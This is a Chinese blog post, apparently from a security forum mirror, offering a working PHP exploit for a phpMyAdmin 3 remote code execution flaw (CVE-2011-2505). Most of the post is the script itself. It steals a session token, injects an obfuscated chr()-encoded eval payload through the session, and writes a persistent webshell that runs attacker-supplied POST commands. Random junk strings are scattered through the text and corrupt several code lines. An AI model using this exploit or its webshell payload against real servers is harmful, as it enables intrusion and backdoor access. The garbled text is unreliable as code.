phpadmin3 remote code execute php版本exploit

admin

最近在家做专职奶爸，不谙圈内事很多months了，博客也无更新。

( ?4 m3 J. A( a: Y昨夜带孩子整夜未眠，看到黑哥在php security群里关于phpmyadmin3漏洞的讨论，虽然之前没看过漏洞代码，不过前段时间还是在微博上看到wofeiwo的exp了，不过据黑哥说有不鸡肋的利用方法，于是夜里翻代码出来研究了翻，写出了这个冷饭exp，由于我搞的晚了，之前已经很多人研究了写exp了，于是我这个属于炒冷饭，权当研究研究打发时间了。
# x$ \2 O' q6 y/ L6 H
0 R' L* k2 ^2 p  ~首先赞下wofeiwo的python版本的exp，再赞下wofeiwo跟superhei的钻研精神，学习的榜样啊。不过之前那个exp利用起来是有一些限制的：
# k+ R  s, G, d5 A) C一是session.auto_start = 1；
* ]1 g2 r2 i- u* y  x5 V) \( n二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟：config目录存在且可写。

  x5 `# @* h* ?, g在群里看了黑哥的发言后，再看了下代码，发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

+ g7 ?7 `+ o5 H" _2 }% z于是写了这个php版本的exp，代码如下：
7 [, [$ c: q0 o
#!/usr/bin/php
<?php
$ f7 p: q: g( g. Uprint_r('
+---------------------------------------------------------------------------+
. K9 D& Z+ N1 k" n# s" F$ B4 h+ Lpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
  P" }. x% n# [/ Z1 u4 iby oldjun(www.oldjun.com)
6 l2 E! X2 S0 u* b4 bwelcome to www.t00ls.net
* f% g8 x- K- Q/ email: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
) U4 k+ ^+ q0 b) c: @0 q( s& Y+---------------------------------------------------------------------------+
');
  ?  r. z; U6 K  Z* F3 y% x
5 \: Y3 w0 u( ?" L) s/**
* working when the directory:"config" exists and is writeable.
**/
9 ~' p# r, X/ O$ Q' d2 r
$ |) Z+ H5 e" C9 I# ]; N- [3 t) t8 fif ($argc < 3) {
" C+ e! l/ g8 X; p/ ?) u1 i  h+ K0 |    print_r('
+---------------------------------------------------------------------------+
; a) @( H4 w0 l4 p: R1 ?Usage: php '.$argv[0].' host path
) o( o* d5 J7 x, e$ p( whost:      target server (ip/hostname)
path:      path to pma3
- s4 t1 m6 Y  b% G7 h( N) {1 q2 VExample:
php '.$argv[0].' localhost /pma/
+ T# t  e5 D6 v3 A" ^3 C+---------------------------------------------------------------------------+
');
    exit;
3 Z# x2 E1 I. `4 R- N! E3 D}

$host = $argv[1];
$path = $argv[2];

2 Y- H1 w2 N: E3 |% P5 i7 r/**
* Try to determine if the directory:"config" exists
**/
9 G  \' g0 o# r' recho "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
* R1 B+ Z& o$ h, l, g0 x7 A    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}
2 E! L/ Q* a2 `1 u2 M- L0 j
/**
* Try to get token and sessionid
**/
) J3 ^  O+ Y6 h$ H0 Recho "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
/ `: _' ?5 x# n& F. mpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
3 T- h! \% I3 Q1 F* c6 Nif($token && $sessionid){
9 Q# g2 ?: A% _9 a2 u    echo "[+] tokentoken\n";
    echo "[+] Session IDsessionid\n";
}else{
( q, a; H1 h5 [  w; R    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
0 G( Z8 G4 {% n}

. s+ d( ^3 O) C( Q* h2 l- a/**
* Try to insert shell into session
**/
) y6 ^9 [0 p7 t% E: v4 A  S5 Wecho "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
* Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
* Try to check if the webshell was created successfully
; u( V0 O' `  l" w/ N) H+ r$ M**/
echo "[+] Try to check if the webshell was created successfully....\n";
; U& X. J7 b/ p* L$ h" e1 z$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
4 s3 [- m5 \4 ~}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}
  P- W+ J! t" d5 @6 c
+ r% B! l0 x1 f1 \/ l0 Efunction php_request($url,$data='',$cookie=''){
    global  $host, $path;
   
    $method=$data?'POST':'GET';
# m3 n" o. W6 E9 z3 `; `   
  [( U+ R0 W) U, \% h& r    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
- g. n. i+ r* v: U% F9 R1 U$ v7 r    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
# R& e9 w  c9 e, Q: Q0 k8 b    $packet .= "Host: $host\r\n";
( R+ ^6 Q0 P- l+ F) g    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
( _+ C& ~) {0 K4 c    $packet .= $data?$data:"";
5 J- M7 \$ {0 O
! K8 b- N; w9 _  m2 t% s8 @    $fp = fsockopen(gethostbyname($host), 80);
' Z  w8 l8 i5 n4 T/ |  w) |    if (!$fp) {
8 \3 T1 i( ~& B9 x7 P    echo 'No response from '.$host; die;
- k  B/ x5 B) o3 A: F' C    }
2 Q$ s0 H4 N. n2 h' G    fputs($fp, $packet);
: j$ S5 E2 E9 c' O7 z
' J4 ]6 X" H+ {4 d" q    $resp = '';
. ?  _5 \+ C3 e7 O$ D; k( r
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
1 @4 t3 Z* G. Z6 k" L
    return $resp;
* `: I& y. Y+ n3 F( @  h9 P- Y}
# m; X/ z0 J" x6 q   
- }& j8 g7 }0 B3 o?>
4 S5 B) Z8 f4 s: I4 o.